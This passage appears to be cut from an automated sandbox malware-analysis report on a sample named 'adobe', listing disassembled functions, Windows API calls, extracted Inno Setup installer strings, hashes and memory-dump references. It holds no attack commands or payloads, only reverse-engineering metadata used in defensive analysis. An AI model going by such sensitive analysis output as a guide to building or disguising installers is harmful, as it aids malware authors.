                                                                                                                                                          • ReadFile.KERNEL32(?,?,00000080,?,00000000,00000000,?,-00000080,00000000,00000000,?,00000000,00000000,80000000,00000002,00000000), ref: 00404BA7
                                                                                                                                                          • SetFilePointer.KERNEL32(?,00000000,00000000,00000002), ref: 00404BD0
                                                                                                                                                          • SetEndOfFile.KERNEL32(?,?,00000000,00000000,00000002), ref: 00404BDA
                                                                                                                                                          • GetStdHandle.KERNEL32(000000F5), ref: 00404BFA
                                                                                                                                                          • GetFileType.KERNEL32(?,000000F5), ref: 00404C11
                                                                                                                                                          • CloseHandle.KERNEL32(?,?,000000F5), ref: 00404C2C
                                                                                                                                                          • GetLastError.KERNEL32(000000F5), ref: 00404C46
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000001.00000002.2904107351.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                          • Associated: 00000001.00000002.2904075458.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                          • Associated: 00000001.00000002.2904207596.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                          • Associated: 00000001.00000002.2904237491.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                          • Associated: 00000001.00000002.2904264823.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                          • Associated: 00000001.00000002.2904291769.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_1_2_400000_adobe.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: File$HandlePointer$CloseCreateErrorLastReadSizeType
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID: 1694776339-0
                                                                                                                                                          • Opcode ID: 9f56c7289f94e04900e6d065ddfea074988f08e379b72121dafcd5ad7d79337d
                                                                                                                                                          • Instruction ID: 0555156f4d2a620bb114dc01d937536d57074fdea11cd86abdfeb4dd56d828b4
                                                                                                                                                          • Opcode Fuzzy Hash: 9f56c7289f94e04900e6d065ddfea074988f08e379b72121dafcd5ad7d79337d
                                                                                                                                                          • Instruction Fuzzy Hash: 3741B3F02093009AF7305E248905B2375E5EBC0755F208E3FE296BA6E0D7BDE8458B1D
                                                                                                                                                          Uniqueness

                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                          Function 004221F8 Relevance: 15.1, APIs: 10, Instructions: 74windowCOMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          APIs
                                                                                                                                                          • GetSystemMenu.USER32(00000000,00000000), ref: 00422243
                                                                                                                                                          • DeleteMenu.USER32(00000000,0000F130,00000000,00000000,00000000), ref: 00422261
                                                                                                                                                          • DeleteMenu.USER32(00000000,00000007,00000400,00000000,0000F130,00000000,00000000,00000000), ref: 0042226E
                                                                                                                                                          • DeleteMenu.USER32(00000000,00000005,00000400,00000000,00000007,00000400,00000000,0000F130,00000000,00000000,00000000), ref: 0042227B
                                                                                                                                                          • DeleteMenu.USER32(00000000,0000F030,00000000,00000000,00000005,00000400,00000000,00000007,00000400,00000000,0000F130,00000000,00000000,00000000), ref: 00422288
                                                                                                                                                          • DeleteMenu.USER32(00000000,0000F020,00000000,00000000,0000F030,00000000,00000000,00000005,00000400,00000000,00000007,00000400,00000000,0000F130,00000000,00000000), ref: 00422295
                                                                                                                                                          • DeleteMenu.USER32(00000000,0000F000,00000000,00000000,0000F020,00000000,00000000,0000F030,00000000,00000000,00000005,00000400,00000000,00000007,00000400,00000000), ref: 004222A2
                                                                                                                                                          • DeleteMenu.USER32(00000000,0000F120,00000000,00000000,0000F000,00000000,00000000,0000F020,00000000,00000000,0000F030,00000000,00000000,00000005,00000400,00000000), ref: 004222AF
                                                                                                                                                          • EnableMenuItem.USER32(00000000,0000F020,00000001), ref: 004222CD
                                                                                                                                                          • EnableMenuItem.USER32(00000000,0000F030,00000001), ref: 004222E9
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000001.00000002.2904107351.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                          • Associated: 00000001.00000002.2904075458.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                          • Associated: 00000001.00000002.2904207596.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                          • Associated: 00000001.00000002.2904237491.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                          • Associated: 00000001.00000002.2904264823.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                          • Associated: 00000001.00000002.2904291769.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_1_2_400000_adobe.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: Menu$Delete$EnableItem$System
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID: 3985193851-0
                                                                                                                                                          • Opcode ID: b9aef185119106b62d1909b50254a2e9e7161919e58d2eca8b004cc57ac8b3b6
                                                                                                                                                          • Instruction ID: b791af981bedf3385b2dd143af085cc0c004e448fbd85fce69a0ff0a91ac5271
                                                                                                                                                          • Opcode Fuzzy Hash: b9aef185119106b62d1909b50254a2e9e7161919e58d2eca8b004cc57ac8b3b6
                                                                                                                                                          • Instruction Fuzzy Hash: 35213370340744BAE720D725DD8BF9B7BD89B04718F4440A5BA487F2D7C7F9AA80869C
                                                                                                                                                          Uniqueness

                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                          Function 00480000 Relevance: 14.2, APIs: 3, Strings: 5, Instructions: 170windowCOMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          APIs
                                                                                                                                                          • FreeLibrary.KERNEL32(10000000), ref: 004801A8
                                                                                                                                                          • FreeLibrary.KERNEL32(02310000), ref: 004801BC
                                                                                                                                                          • SendNotifyMessageA.USER32(00020466,00000496,00002710,00000000), ref: 0048022E
                                                                                                                                                          Strings
                                                                                                                                                          • Not restarting Windows because Setup is being run from the debugger., xrefs: 004801DD
                                                                                                                                                          • Restarting Windows., xrefs: 00480209
                                                                                                                                                          • GetCustomSetupExitCode, xrefs: 0048005D
                                                                                                                                                          • DeinitializeSetup, xrefs: 004800B9
                                                                                                                                                          • Deinitializing Setup., xrefs: 0048001E
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000001.00000002.2904107351.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                          • Associated: 00000001.00000002.2904075458.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                          • Associated: 00000001.00000002.2904207596.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                          • Associated: 00000001.00000002.2904237491.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                          • Associated: 00000001.00000002.2904264823.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                          • Associated: 00000001.00000002.2904291769.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_1_2_400000_adobe.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: FreeLibrary$MessageNotifySend
                                                                                                                                                          • String ID: DeinitializeSetup$Deinitializing Setup.$GetCustomSetupExitCode$Not restarting Windows because Setup is being run from the debugger.$Restarting Windows.
                                                                                                                                                          • API String ID: 3817813901-1884538726
                                                                                                                                                          • Opcode ID: d47b7e57319d749007a9a755c2177fcb094d913dfc3eafe5d164ec163588edb2
                                                                                                                                                          • Instruction ID: cee3c0feaa82f34ff8ccc77a058218ffec1e5727e3f2c49cfa21192a85072f61
                                                                                                                                                          • Opcode Fuzzy Hash: d47b7e57319d749007a9a755c2177fcb094d913dfc3eafe5d164ec163588edb2
                                                                                                                                                          • Instruction Fuzzy Hash: BD51A3306142009FD761EB69E949B5E77E4EB19714F6088BBFC04C73A2DB389C49CB99
                                                                                                                                                          Uniqueness

                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                          Function 00460EB4 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 82COMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          APIs
                                                                                                                                                          • SHGetMalloc.SHELL32(?), ref: 00460EEF
                                                                                                                                                          • GetActiveWindow.USER32 ref: 00460F53
                                                                                                                                                          • CoInitialize.OLE32(00000000), ref: 00460F67
                                                                                                                                                          • SHBrowseForFolder.SHELL32(?), ref: 00460F7E
                                                                                                                                                          • 756CD120.OLE32(00460FBF,00000000,?,?,?,?,?,00000000,00461043), ref: 00460F93
                                                                                                                                                          • SetActiveWindow.USER32(?,00460FBF,00000000,?,?,?,?,?,00000000,00461043), ref: 00460FA9
                                                                                                                                                          • SetActiveWindow.USER32(?,?,00460FBF,00000000,?,?,?,?,?,00000000,00461043), ref: 00460FB2
                                                                                                                                                          Strings
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000001.00000002.2904107351.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                          • Associated: 00000001.00000002.2904075458.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                          • Associated: 00000001.00000002.2904207596.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                          • Associated: 00000001.00000002.2904237491.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                          • Associated: 00000001.00000002.2904264823.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                          • Associated: 00000001.00000002.2904291769.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_1_2_400000_adobe.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: ActiveWindow$BrowseD120FolderInitializeMalloc
                                                                                                                                                          • String ID: A
                                                                                                                                                          • API String ID: 2698730301-3554254475
                                                                                                                                                          • Opcode ID: 73697bf61bfb662cf97866c946a68ef996e92b42bbd051bc0dafbf817f01a1ea
                                                                                                                                                          • Instruction ID: 2c77ed91a8417aff65a374401c3b3fdadfccc17f1b0de07755fa7fda1c92976a
                                                                                                                                                          • Opcode Fuzzy Hash: 73697bf61bfb662cf97866c946a68ef996e92b42bbd051bc0dafbf817f01a1ea
                                                                                                                                                          • Instruction Fuzzy Hash: 98314FB0D00208AFDB14EFA6D885A9EBBF8EB09304F51447AF504E7251E7789A04CB59
                                                                                                                                                          Uniqueness

                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                          Function 00471AFC Relevance: 14.1, APIs: 3, Strings: 5, Instructions: 67COMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          APIs
                                                                                                                                                          • GetFileAttributesA.KERNEL32(00000000,00000000,00471BBD,?,?,?,00000008,00000000,00000000,00000000,?,00471E19,?,?,00000000,00472084), ref: 00471B20
                                                                                                                                                            • Part of subcall function 0042CD60: GetPrivateProfileStringA.KERNEL32(00000000,00000000,00000000,00000000,00000100,00000000), ref: 0042CDD6
                                                                                                                                                            • Part of subcall function 00406F58: DeleteFileA.KERNEL32(00000000,0049A628,00496DB9,00000000,00496E0E,?,?,00000005,?,00000000,00000000,00000000,Inno-Setup-RegSvr-Mutex,?,00000005,00000000), ref: 00406F63
                                                                                                                                                          • SetFileAttributesA.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00471BBD,?,?,?,00000008,00000000,00000000,00000000,?,00471E19), ref: 00471B97
                                                                                                                                                          • RemoveDirectoryA.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00471BBD,?,?,?,00000008,00000000,00000000,00000000), ref: 00471B9D
                                                                                                                                                          Strings
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000001.00000002.2904107351.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                          • Associated: 00000001.00000002.2904075458.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                          • Associated: 00000001.00000002.2904207596.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                          • Associated: 00000001.00000002.2904237491.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                          • Associated: 00000001.00000002.2904264823.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                          • Associated: 00000001.00000002.2904291769.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_1_2_400000_adobe.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: File$Attributes$DeleteDirectoryPrivateProfileRemoveString
                                                                                                                                                          • String ID: .ShellClassInfo$CLSID2$desktop.ini$target.lnk${0AFACED1-E828-11D1-9187-B532F1E9575D}
                                                                                                                                                          • API String ID: 884541143-1710247218
                                                                                                                                                          • Opcode ID: 88d258bcb0cfe34371e37a5fb7e2f2979d44c951644709225c3257378c2324f9
                                                                                                                                                          • Instruction ID: df1969d3b2e75b623ed12d1a57b4041883c9501f119f73ce0aa373245b01fd35
                                                                                                                                                          • Opcode Fuzzy Hash: 88d258bcb0cfe34371e37a5fb7e2f2979d44c951644709225c3257378c2324f9
                                                                                                                                                          • Instruction Fuzzy Hash: FF11E2307005187BD711EA6E8C82B9F73ADDB45714FA0817BB414B72D1EB3CAE02865C
                                                                                                                                                          Uniqueness

                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                          Function 0045CAD4 Relevance: 14.0, APIs: 4, Strings: 4, Instructions: 41libraryloaderCOMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          APIs
                                                                                                                                                          • GetProcAddress.KERNEL32(02310000,inflateInit_), ref: 0045CADD
                                                                                                                                                          • GetProcAddress.KERNEL32(02310000,inflate), ref: 0045CAED
                                                                                                                                                          • GetProcAddress.KERNEL32(02310000,inflateEnd), ref: 0045CAFD
                                                                                                                                                          • GetProcAddress.KERNEL32(02310000,inflateReset), ref: 0045CB0D
                                                                                                                                                          Strings
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000001.00000002.2904107351.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                          • Associated: 00000001.00000002.2904075458.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                          • Associated: 00000001.00000002.2904207596.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                          • Associated: 00000001.00000002.2904237491.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                          • Associated: 00000001.00000002.2904264823.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                          • Associated: 00000001.00000002.2904291769.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_1_2_400000_adobe.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: AddressProc
                                                                                                                                                          • String ID: inflate$inflateEnd$inflateInit_$inflateReset
                                                                                                                                                          • API String ID: 190572456-3516654456
                                                                                                                                                          • Opcode ID: e365b530c7071674726e76c88cbd42779a0a52ee7bf24cd43f30570c52ec1394
                                                                                                                                                          • Instruction ID: 525a7e9e0fda6c84af7054bd7e5f3a46cafb7a33014c5953919690b79c8ceac0
                                                                                                                                                          • Opcode Fuzzy Hash: e365b530c7071674726e76c88cbd42779a0a52ee7bf24cd43f30570c52ec1394
                                                                                                                                                          • Instruction Fuzzy Hash: 41012CB0901300DEDB14DF36BECA72736B5E760B96F14903B9C54992A2D778144CCB9C
                                                                                                                                                          Uniqueness

                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                          Function 0041A8EC Relevance: 13.7, APIs: 9, Instructions: 176windowCOMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          APIs
                                                                                                                                                          • SetBkColor.GDI32(?,00000000), ref: 0041A9C9
                                                                                                                                                          • 73A24D40.GDI32(?,00000000,00000000,?,?,?,00000000,00000000,00CC0020,?,00000000), ref: 0041AA03
                                                                                                                                                          • SetBkColor.GDI32(?,?), ref: 0041AA18
                                                                                                                                                          • StretchBlt.GDI32(00000000,00000000,00000000,?,00000000,?,00000000,00000000,?,?,00CC0020), ref: 0041AA62
                                                                                                                                                          • SetTextColor.GDI32(00000000,00000000), ref: 0041AA6D
                                                                                                                                                          • SetBkColor.GDI32(00000000,00FFFFFF), ref: 0041AA7D
                                                                                                                                                          • StretchBlt.GDI32(00000000,00000000,00000000,?,00000000,?,00000000,00000000,?,?,00E20746), ref: 0041AABC
                                                                                                                                                          • SetTextColor.GDI32(00000000,00000000), ref: 0041AAC6
                                                                                                                                                          • SetBkColor.GDI32(00000000,?), ref: 0041AAD3
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000001.00000002.2904107351.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                          • Associated: 00000001.00000002.2904075458.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                          • Associated: 00000001.00000002.2904207596.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                          • Associated: 00000001.00000002.2904237491.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                          • Associated: 00000001.00000002.2904264823.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                          • Associated: 00000001.00000002.2904291769.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_1_2_400000_adobe.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: Color$StretchText
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID: 2984075790-0
                                                                                                                                                          • Opcode ID: 76d092ad3213984249078ebe0a84a9e6ce1a1d401503c160032635bc52d3de4f
                                                                                                                                                          • Instruction ID: 2bdc14f7f78cb6bf094045e191087cf2cdbf471e5afceb3518b79a0be2d35765
                                                                                                                                                          • Opcode Fuzzy Hash: 76d092ad3213984249078ebe0a84a9e6ce1a1d401503c160032635bc52d3de4f
                                                                                                                                                          • Instruction Fuzzy Hash: 4E61E5B5A00105EFCB40EFADD985E9AB7F8AF08354B10816AF508DB261CB34ED44CF68
                                                                                                                                                          Uniqueness

                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                          Function 004573BC Relevance: 13.6, APIs: 1, Strings: 8, Instructions: 126COMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          APIs
                                                                                                                                                            • Part of subcall function 0042D890: GetSystemDirectoryA.KERNEL32(?,00000104), ref: 0042D8A3
                                                                                                                                                          • CloseHandle.KERNEL32(?,?,00000044,00000000,00000000,04000000,00000000,00000000,00000000,00457570,?, /s ",?,regsvr32.exe",?,00457570), ref: 004574E2
                                                                                                                                                          Strings
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000001.00000002.2904107351.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                          • Associated: 00000001.00000002.2904075458.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                          • Associated: 00000001.00000002.2904207596.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                          • Associated: 00000001.00000002.2904237491.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                          • Associated: 00000001.00000002.2904264823.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                          • Associated: 00000001.00000002.2904291769.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_1_2_400000_adobe.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: CloseDirectoryHandleSystem
                                                                                                                                                          • String ID: /s "$ /u$0x%x$CreateProcess$D$Spawning 32-bit RegSvr32: $Spawning 64-bit RegSvr32: $regsvr32.exe"
                                                                                                                                                          • API String ID: 2051275411-1862435767
                                                                                                                                                          • Opcode ID: 8b63587add3ee564f98abe6a23ec759f239168e66a918bf5f758ba5d13c8dbb7
                                                                                                                                                          • Instruction ID: c75e28b62514bd1008de2d5da4676738b051ff84ac3b4320ed53282cf2518592
                                                                                                                                                          • Opcode Fuzzy Hash: 8b63587add3ee564f98abe6a23ec759f239168e66a918bf5f758ba5d13c8dbb7
                                                                                                                                                          • Instruction Fuzzy Hash: 9F412770E0430C6BDB11EFD5D842B8DB7F9AF45305F50407BA908BB692D7789A098B5D
                                                                                                                                                          Uniqueness

                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                          Function 0044C9CC Relevance: 13.6, APIs: 9, Instructions: 90COMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          APIs
                                                                                                                                                          • OffsetRect.USER32(?,00000001,00000001), ref: 0044C9FD
                                                                                                                                                          • GetSysColor.USER32(00000014), ref: 0044CA04
                                                                                                                                                          • SetTextColor.GDI32(00000000,00000000), ref: 0044CA1C
                                                                                                                                                          • DrawTextA.USER32(00000000,00000000,00000000), ref: 0044CA45
                                                                                                                                                          • OffsetRect.USER32(?,000000FF,000000FF), ref: 0044CA4F
                                                                                                                                                          • GetSysColor.USER32(00000010), ref: 0044CA56
                                                                                                                                                          • SetTextColor.GDI32(00000000,00000000), ref: 0044CA6E
                                                                                                                                                          • DrawTextA.USER32(00000000,00000000,00000000), ref: 0044CA97
                                                                                                                                                          • DrawTextA.USER32(00000000,00000000,00000000), ref: 0044CAC2
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000001.00000002.2904107351.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                          • Associated: 00000001.00000002.2904075458.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                          • Associated: 00000001.00000002.2904207596.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                          • Associated: 00000001.00000002.2904237491.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                          • Associated: 00000001.00000002.2904264823.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                          • Associated: 00000001.00000002.2904291769.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_1_2_400000_adobe.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: Text$Color$Draw$OffsetRect
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID: 1005981011-0
                                                                                                                                                          • Opcode ID: 0dde5dfefa80da91ffb1f415c8619ddafc2b78759cb1f1039b07dde114a2dbdb
                                                                                                                                                          • Instruction ID: cbf23e484866fe7d62e86adeccfbc8e31d2d10e105370748ca703b53abdb5865
                                                                                                                                                          • Opcode Fuzzy Hash: 0dde5dfefa80da91ffb1f415c8619ddafc2b78759cb1f1039b07dde114a2dbdb
                                                                                                                                                          • Instruction Fuzzy Hash: 6821EFB42015047FC710FB2ACC8AE8B7BDCDF19319B01457A7918EB393C678DD408669
                                                                                                                                                          Uniqueness

                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                          Function 0045327C Relevance: 12.5, APIs: 1, Strings: 6, Instructions: 225COMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          APIs
                                                                                                                                                          • WritePrivateProfileStringA.KERNEL32(00000000,00000000,00000000,00000000), ref: 00453363
                                                                                                                                                          Strings
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000001.00000002.2904107351.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                          • Associated: 00000001.00000002.2904075458.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                          • Associated: 00000001.00000002.2904207596.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                          • Associated: 00000001.00000002.2904237491.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                          • Associated: 00000001.00000002.2904264823.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                          • Associated: 00000001.00000002.2904291769.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_1_2_400000_adobe.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: PrivateProfileStringWrite
                                                                                                                                                          • String ID: (rI$.tmp$MoveFileEx$NUL$WININIT.INI$[rename]
                                                                                                                                                          • API String ID: 390214022-1223912792
                                                                                                                                                          • Opcode ID: 77d8440133c81d55e85531f21278540480c21e6c928ae3c30ee1a0d437c9d52f
                                                                                                                                                          • Instruction ID: c373c87e8fcbee70df1f3a37a90da570fcb7fd3878d7a318cdf2ff94c307cb29
                                                                                                                                                          • Opcode Fuzzy Hash: 77d8440133c81d55e85531f21278540480c21e6c928ae3c30ee1a0d437c9d52f
                                                                                                                                                          • Instruction Fuzzy Hash: 88912430A00109ABDB11EFA5D842BDEB7B5EF49346F508567F800B7392D778AE098B58
                                                                                                                                                          Uniqueness

                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                          Function 0041B67C Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 144windowCOMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          APIs
                                                                                                                                                          • GetFocus.USER32 ref: 0041B755
                                                                                                                                                          • 73A1A570.USER32(?), ref: 0041B761
                                                                                                                                                          • 73A18830.GDI32(00000000,?,00000000,00000000,0041B82C,?,?), ref: 0041B796
                                                                                                                                                          • 73A122A0.GDI32(00000000,00000000,?,00000000,00000000,0041B82C,?,?), ref: 0041B7A2
                                                                                                                                                          • 73A26310.GDI32(00000000,?,00000004,?,?,00000000,00000000,0041B80A,?,00000000,0041B82C,?,?), ref: 0041B7D0
                                                                                                                                                          • 73A18830.GDI32(00000000,00000000,00000000,0041B811,?,?,00000000,00000000,0041B80A,?,00000000,0041B82C,?,?), ref: 0041B804
                                                                                                                                                          Strings
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000001.00000002.2904107351.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                          • Associated: 00000001.00000002.2904075458.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                          • Associated: 00000001.00000002.2904207596.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                          • Associated: 00000001.00000002.2904237491.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                          • Associated: 00000001.00000002.2904264823.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                          • Associated: 00000001.00000002.2904291769.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_1_2_400000_adobe.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: A18830$A122A26310A570Focus
                                                                                                                                                          • String ID: {H
                                                                                                                                                          • API String ID: 3906783838-1783425356
                                                                                                                                                          • Opcode ID: 93e68c4b9a3bd67db3154bc0fc4d8c0f4444c0b5e7637da7f247583ea3dba257
                                                                                                                                                          • Instruction ID: e4fa2330707e2e3496a7563b6e1a8945dd65194040c1b513b55e56702052f46b
                                                                                                                                                          • Opcode Fuzzy Hash: 93e68c4b9a3bd67db3154bc0fc4d8c0f4444c0b5e7637da7f247583ea3dba257
                                                                                                                                                          • Instruction Fuzzy Hash: 33512D74A00208AFCB11DFA9C855AEEBBF9FF49704F104466F504A7390D7789981CBA9
                                                                                                                                                          Uniqueness

                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                          Function 0041B94C Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 142windowCOMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          APIs
                                                                                                                                                          • GetFocus.USER32 ref: 0041BA27
                                                                                                                                                          • 73A1A570.USER32(?), ref: 0041BA33
                                                                                                                                                          • 73A18830.GDI32(00000000,?,00000000,00000000,0041BAF9,?,?), ref: 0041BA6D
                                                                                                                                                          • 73A122A0.GDI32(00000000,00000000,?,00000000,00000000,0041BAF9,?,?), ref: 0041BA79
                                                                                                                                                          • 73A26310.GDI32(00000000,?,00000004,?,?,00000000,00000000,0041BAD7,?,00000000,0041BAF9,?,?), ref: 0041BA9D
                                                                                                                                                          • 73A18830.GDI32(00000000,00000000,00000000,0041BADE,?,?,00000000,00000000,0041BAD7,?,00000000,0041BAF9,?,?), ref: 0041BAD1
                                                                                                                                                          Strings
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000001.00000002.2904107351.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
